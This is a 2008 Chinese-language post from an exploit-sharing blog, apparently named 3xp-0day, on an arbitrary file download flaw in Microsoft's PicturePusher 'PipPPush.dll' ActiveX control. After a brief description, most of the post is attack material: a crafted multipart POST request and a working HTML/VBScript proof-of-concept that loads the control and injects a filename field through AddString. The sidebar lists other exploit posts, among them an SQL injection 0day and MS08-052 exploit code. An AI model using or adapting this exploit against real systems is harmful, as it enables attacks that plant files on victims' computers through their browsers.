-
2008-10-12
Microsoft PicturePusher 'PipPPush.dll' ActiveX控件任意文件下载漏洞 - [exp'or'0day]
版权声明:转载时请以超链接形式标明文章原始出处和作者信息及本声明
http://3xp-0day.blogbus.com/logs/30157362.html
Microsoft Digital Image是一款图像管理处理工具。
其包含的PicturePusher 'PipPPush.dll' ActiveX控件存在设计问题,远程攻击者可以利用漏洞从任意位置下载文件到受影响的电脑。
控件允许构建定制的POST请求实现上传功能,使用浏览器作为代理可以回弹,并通过AddString()方法注入文件名子字段。类似的POST请求如下:
POST /?aaaa=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT 5.0) [MSN Communities Active-X Upload Control]
Host: 127.0.0.1
Content-Length: 181
Cache-Control: no-cache
-----------------------------
Content-Disposition: form-data; name="aaaa"; filename="suntzu.test"
Content-Type: text/plain; AAAA: ""
xxxxxxxx
-------------------------------<HTML> <OBJECT classid='clsid:507813C3-0B26-47AD-A8C0-D483C7A21FA7' id='PicturePusherControl' /> </OBJECT> <script language='vbscript'> 'PicturePusherControl.PostURL = "http://127.0.0.1/?aaaa=1" PicturePusherControl.PostURL = "http://192.168.1.1/?aaaa=1" PicturePusherControl.AddSeperator CRLF = unescape("%0d%0a") FormElementName="aaaa""; filename=""suntzu.test"" " + CRLF + "Content-Type: text/plain; AAAA: """ Value="xxxxxxxx" 'for some reason cannot do this with AddFile() method, however... PicturePusherControl.AddString FormElementName ,Value PicturePusherControl.Post </script>随机文章:
关于QQ空间挂马的原理 2008-08-06sablog 1.6注射漏洞 2008-08-06phpwind任意修改管理员密码漏洞 2008-08-06PowerDVD '.m3u'/'.pls'文件多个缓冲区溢出漏洞 2008-07-24Kaspersky kl1.sys驱动本地栈溢出漏洞 2008-06-07
收藏到:Del.icio.us
3xp-0day'Blog
3xp-0day
搜索
最新日志
- MS Windows GDI+ Proof of Concept (MS08-052) #2
- Microsoft PicturePusher 'PipPPush.dll' ActiveX控件任意文件下载漏洞
- Serv-U 7.2.0.1 ftp file replacement
- MSN Messenger的PNG图像缓冲区溢出漏洞下载Shellcoded
- RealPlayer/Helix Player Remote Format String Exploit (linux)
- QZone新版开始支持Firefox浏览器
- VB100结果揭晓 金山毒霸三冠王
- PhpCms2007 sp6 SQL injection 0day
- ESET System Analyzer Tool
- 传说中微软最强的漏洞MS08052的利用代码
